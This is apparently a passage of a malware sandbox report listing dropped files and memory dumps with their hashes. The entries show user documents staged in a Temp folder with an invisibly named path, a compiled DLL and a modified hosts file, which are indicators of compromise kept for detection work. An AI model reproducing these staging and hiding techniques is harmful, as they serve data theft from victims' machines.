5e9add4dd806c2de4d694b9bb038a6716badb7d5f912884d80d593592bcdb8ca

SHA512
77aa10ae645c0ba24e31dcab4726d8fb7aa3cb9708c7c85499e7d82ce46609d43e5dc74da7cd32c170c7ddf50c8db8945baf3452421316c4a46888d745de8da0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qr5uqs5u.ljp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\s2tggbk0\s2tggbk0.dll

Filesize
4KB

MD5
2942d1bf612a6c4acedf98cb7727cc6d

SHA1
54ff89b377ae6e88a65920c31b6f825ce3477d4f

SHA256
e5f729184a33e82993d8333b1cbc87c759b0f8e2399ce584c6ff55a16c6b2a6d

SHA512
46bb138f8f842f56d530a6f8a2f43a334dc2459a46dbf9aff4d3870800e16482ba6a34d56e3a30f3d7e8b9adf3a5fee7343ad220aa4fe2631e1cbe60ce1735e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ \Common Files\Desktop\BackupResolve.DVR

Filesize
174KB

MD5
07199a77c0817a711eeefb13a309b365

SHA1
94698e2cba3e60b08bb129ca50bce358d2b6aafa

SHA256
9580d31375851a5f45cd10066a2b19a346f7fc82702eaa80ac694684f60e5f67

SHA512
b182ee8b4aa1d322f81edd3ffd777e396c25c8bf1c79b69a441497f85ea30234311c1f28c3941660e89911f6258994760c154e585cf0ab10cb5d29cc8c3af58a

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ \Common Files\Desktop\DebugClose.xlsx

Filesize
348KB

MD5
abf32ff37880a000db4a329624d54bcd

SHA1
d25b73cf70ddc187ba1794851add0d5eaefc4941

SHA256
45f4b17934172ff1d295561e88b90e999b9ef05bbee5a7ffe2eefdd08cc40900

SHA512
0aa9e7874715fa56e26d50a8ee6e3b8370e37a494079c648ae954645d15fd9b3542441b6c7d7594b926ce51f92200f72a1b1c4e3f2cacd32fd5b88b98069f009

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ \Common Files\Desktop\ImportRepair.xlsx

Filesize
12KB

MD5
f6b1ef0961a2f7de4368e89a4cad651a

SHA1
80d68d00b85a02b351b8872973a0f5aff1a79699

SHA256
270a1df9627b4d581591c7db72e5fc2794ce899341648dc98adf20d581f8a8d0

SHA512
dd994551badb1cbb5df5114c211c428270b7eee422a611e1dd4f92f9b4f308562dac619de760c902711c445865138454e488e5e472d807bdb61ea13fcb85facc

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ \Common Files\Desktop\ShowBlock.xlsx

Filesize
10KB

MD5
0bb2ca4d05ed1250d77df030029fb1c0

SHA1
b4c4052154131b2cf0217ada67fe9d814f6a7ab3

SHA256
78e502f3f45b16ca44f033f9137e5065b373c310cbc423cae57614ab6e14fcdd

SHA512
ffa60a990a223676fd92792ca9e5dd1a32457dfdd5e856fb00521496b00ee8eb72b7e8c3630998e85b1f9c34ef74d11b549a6b16f542fed4a1d0622cd5ebb1c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ \Common Files\Desktop\UninstallUse.mp3

Filesize
398KB

MD5
0609674a37d4a0ff561c4bf92566a283

SHA1
b664161bd26aa5165be2827e4d3c05b10e72af7f

SHA256
cd9f23a37e47d1919272cf73a690417feb97612f8d6dcd1c87ef5744eef86728

SHA512
46ebc97925f4c98474c72fb159466e331cc30946a0a66750cb1e639587e9701452cddb3dd9b5a6adf29baa6df0f873f67842221b7ad0d38b24de6510f47a2fb7

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ \Common Files\Desktop\WriteStop.png

Filesize
199KB

MD5
57132d547ea641913b084aacfd06f90a

SHA1
b6cf9e27434769c352fb97c71d055e31fce7d2ba

SHA256
ffa62fa4b3f620dd3c005b7593186cdcd2eec7abda2ef6b3a81ae994c37fcdc3

SHA512
52c5fb32c23e374be433ff95f8de3d1ea916b9339a3cbe632504042aa488198fb1d40d58c9e78571356062a53caf79b91ed28bd740289eae0134df5845e92de8

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ \Common Files\Documents\ConvertFromRequest.docx

Filesize
17KB

MD5
7e929a3a58d501b733acf6c078142d4a

SHA1
da796f7b89725bbb2349c13867f4d476a693507e

SHA256
8d19f63698f2f35ec76d31715563f57fd674510f01f9e0b2535e322af85b9c88

SHA512
fdb8f4ab98d82a0785d398f8af384beb138d966024cf2d30ff52573112480d9e88a88faf1af6b79b145487f6842e5f63c5a0a4c1f6cf3ebd8b702ee3dd3a2299

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ \Common Files\Documents\NewShow.doc

Filesize
1.6MB

MD5
d43a19b751b4e82a9a33bf6a1f100c3e

SHA1
adffe2b2de5b12164a50fb303c07adf4fc8e8777

SHA256
5efb6dbf365f7cdc7b4a6053e83f0a68e78fd6683708e08f5a221e3761e5f0a4

SHA512
0e058786f115aac309b8b5ab3a1f9704445d2b6ff59d2b8c9d0b1d86c0b352dc6d518c485996e0f878e79d81b9f7e3e243b0c18c35cfb391af8dc129392dc404

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ \Common Files\Downloads\ExportStep.mp3

Filesize
342KB

MD5
b53b70cd23a461a9643611456da2396a

SHA1
7ddd695eedaf842163030c42e3895e53ac45b9f6

SHA256
44117fb910ad4eaccb16a9ea7dbe8a464284f074ea9e0b41e62b300536d4db12

SHA512
ba20433ee0ee00ccc9fb8e745f4cdcb62f555b857bcbb7ed335bf80bf1a7ce26fd3b7657d1907aa4d3a024ffd967758d88de73696ff2a2b20cf2c3032758a7f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ \Common Files\Downloads\PublishSearch.png

Filesize
733KB

MD5
22061b5b8b97f6639c25875675c1009a

SHA1
5e0de3e8e07a62694281fb0b417e1935221bd77d

SHA256
02b82b991e810543b844de9b9e61175a7f93bf8d405ca572488c8fecdc5f70c0

SHA512
7da4e213c40863c45f37904bb99321cee3bf5072c3d0b491eecbe11f5edb8107b2aaf0c9c60206b156bc26a42c328a7134ad0a2755b3bd94f753ce71abd27c87

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ \Common Files\Music\JoinBackup.wdp

Filesize
199KB

MD5
077d4f6ae9d70136ef90601051e3b763

SHA1
3ace5a86ab27880a468719308399a2dca7347894

SHA256
e45b7d78b6978b1d89c8c66f7d4c2ebf7621261e17b38cebf6f1be72e72ae1d1

SHA512
2d392a9bc59e3840243e203f31124b3517499f3dab918573bf0272e0d37ca00ab6f7ee93d66ecd05b10ab78894e982f81e3f4d02a2ab9ac16ac8e51c8a2f14b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ \Common Files\Music\WatchSet.txt

Filesize
101KB

MD5
87a7b0988ade1e6a8d24a607000287de

SHA1
cad0f8739a2fa7f26b176673a58d6899010af23e

SHA256
4ff843e2d6a74e8c26a218ecf98631c4faa1b48a4ef025f76f3c0327db7cc48d

SHA512
8f4f836d27ab44f459413a3fcafbbaa0f667c69c24e3a3f53a09386f4295b386e34d0995355e9ab8e2f117012b694867daa7cfc50c5e6a0c5a673f07dfca8eef

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ \Common Files\Pictures\ClearUnblock.jpg

Filesize
377KB

MD5
37483de3d6c69cb460051832f034c2ff

SHA1
7dc9e9d3d02326540da813a3413140aa7c327a18

SHA256
abee0bda1e99462e59bcf3bd0ab12fbaa3edd3f5bd94409c66e2da033ee6340a

SHA512
0278e41fb1c43af7fa48950dae0b46f7aacee111ffcfeefa6d5487de501ab0ae958c12002ffbd0d59d77911fa7f628a16b0ccfb9dd3f4d5988719a9297f8d9c2

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\s2tggbk0\CSC7E69320E970F4A66B81DCD1F7C7F64DD.TMP

Filesize
652B

MD5
649e811698cb14798dbb95e74cd206e0

SHA1
4bb1cbdce091ac1f7825ac6cb837777672d0db4c

SHA256
c13e39e6c8f150c6908221bdd0cf35e7d8878b9ccefe6e07c7260264fb9774e6

SHA512
8ec86e2ad38ac9a59d7c53a39571523585c387f6c5db02b2cb4c7588e50004043ee452c217e7289ae615e5604f5cb7dba6244011e801a7dfdb8ea8d942245deb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\s2tggbk0\s2tggbk0.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\s2tggbk0\s2tggbk0.cmdline

Filesize
607B

MD5
1ef778e80cc4b4fefc530c0322b80987

SHA1
54b15b5f525a191b725dec0117df6bd429eea281

SHA256
00b10e28d4a3d19e985214d1f5c91a19eab7acdd3549230798f419ea71b5667c

SHA512
53fed04da5521879bf3aa7857b94f7e9dfe445267e6e56c7986a62e294e58767f5ecf419f34aaf59e083dce8eb655c495fca83b40636d694041d342f99547986

Download Submit
memory/1576-186-0x00000235D58C0000-0x00000235D58C8000-memory.dmp

Filesize
32KB

Download
memory/4312-69-0x00007FFE26950000-0x00007FFE26974000-memory.dmp

Filesize
144KB

Download
memory/4312-309-0x00007FFE25B50000-0x00007FFE25B69000-memory.dmp

Filesize
100KB

Download
memory/4312-102-0x00007FFE25FC0000-0x00007FFE26131000-memory.dmp

Filesize
1.4MB

Download
memory/4312-164-0x00007FFE21D00000-0x00007FFE21D2E000-memory.dmp

Filesize
184KB

Download
memory/4312-78-0x00007FFE26910000-0x00007FFE2691D000-memory.dmp

Filesize
52KB

Download
memory/4312-32-0x00007FFE2F900000-0x00007FFE2F90F000-memory.dmp

Filesize
60KB

Download
memory/4312-80-0x00007FFE26140000-0x00007FFE2615E000-memory.dmp

Filesize
120KB

Download
memory/4312-81-0x00007FFE17390000-0x00007FFE174A8000-memory.dmp

Filesize
1.1MB

Download
memory/4312-31-0x00007FFE26950000-0x00007FFE26974000-memory.dmp

Filesize
144KB

Download
memory/4312-191-0x00007FFE16B50000-0x00007FFE16C07000-memory.dmp

Filesize
732KB

Download
memory/4312-192-0x00007FFE167D0000-0x00007FFE16B47000-memory.dmp

Filesize
3.5MB

Download
memory/4312-25-0x00007FFE17710000-0x00007FFE17B75000-memory.dmp

Filesize
4.4MB

Download
memory/4312-251-0x00007FFE26950000-0x00007FFE26974000-memory.dmp

Filesize
144KB

Download
memory/4312-265-0x000002310E400000-0x000002310E777000-memory.dmp

Filesize
3.5MB

Download
memory/4312-256-0x00007FFE25FC0000-0x00007FFE26131000-memory.dmp

Filesize
1.4MB

Download
memory/4312-250-0x00007FFE17710000-0x00007FFE17B75000-memory.dmp

Filesize
4.4MB

Download
memory/4312-255-0x00007FFE26140000-0x00007FFE2615E000-memory.dmp

Filesize
120KB

Download
memory/4312-65-0x00007FFE26870000-0x00007FFE2687D000-memory.dmp

Filesize
52KB

Download
memory/4312-73-0x00007FFE167D0000-0x00007FFE16B47000-memory.dmp

Filesize
3.5MB

Download
memory/4312-74-0x000002310E400000-0x000002310E777000-memory.dmp

Filesize
3.5MB

Download
memory/4312-64-0x00007FFE17710000-0x00007FFE17B75000-memory.dmp

Filesize
4.4MB

Download
memory/4312-70-0x00007FFE16B50000-0x00007FFE16C07000-memory.dmp

Filesize
732KB

Download
memory/4312-308-0x00007FFE25FC0000-0x00007FFE26131000-memory.dmp

Filesize
1.4MB

Download
memory/4312-108-0x00007FFE25B50000-0x00007FFE25B69000-memory.dmp

Filesize
100KB

Download
memory/4312-76-0x00007FFE2C760000-0x00007FFE2C775000-memory.dmp

Filesize
84KB

Download
memory/4312-62-0x00007FFE25B50000-0x00007FFE25B69000-memory.dmp

Filesize
100KB

Download
memory/4312-60-0x00007FFE25FC0000-0x00007FFE26131000-memory.dmp

Filesize
1.4MB

Download
memory/4312-58-0x00007FFE26140000-0x00007FFE2615E000-memory.dmp

Filesize
120KB

Download
memory/4312-56-0x00007FFE26880000-0x00007FFE26898000-memory.dmp

Filesize
96KB

Download
memory/4312-54-0x00007FFE268A0000-0x00007FFE268CC000-memory.dmp

Filesize
176KB

Download
memory/4312-313-0x00007FFE167D0000-0x00007FFE16B47000-memory.dmp

Filesize
3.5MB

Download
memory/4312-307-0x00007FFE26140000-0x00007FFE2615E000-memory.dmp

Filesize
120KB

Download
memory/4312-324-0x00007FFE17390000-0x00007FFE174A8000-memory.dmp

Filesize
1.1MB

Download
memory/4312-323-0x00007FFE26910000-0x00007FFE2691D000-memory.dmp

Filesize
52KB

Download
memory/4312-322-0x00007FFE2C760000-0x00007FFE2C775000-memory.dmp

Filesize
84KB

Download
memory/4312-321-0x00007FFE16B50000-0x00007FFE16C07000-memory.dmp

Filesize
732KB

Download
memory/4312-320-0x00007FFE21D00000-0x00007FFE21D2E000-memory.dmp

Filesize
184KB

Download
memory/4312-319-0x00007FFE26870000-0x00007FFE2687D000-memory.dmp

Filesize
52KB

Download
memory/4312-318-0x00007FFE26950000-0x00007FFE26974000-memory.dmp

Filesize
144KB

Download
memory/4312-317-0x00007FFE2F900000-0x00007FFE2F90F000-memory.dmp

Filesize
60KB

Download
memory/4312-306-0x00007FFE26880000-0x00007FFE26898000-memory.dmp

Filesize
96KB

Download
memory/4312-305-0x00007FFE268A0000-0x00007FFE268CC000-memory.dmp

Filesize
176KB

Download
memory/4312-302-0x00007FFE17710000-0x00007FFE17B75000-memory.dmp

Filesize
4.4MB

Download
memory/4312-67-0x00007FFE21D00000-0x00007FFE21D2E000-memory.dmp

Filesize
184KB

Download
memory/5076-91-0x0000019A53510000-0x0000019A53532000-memory.dmp

Filesize
136KB

Download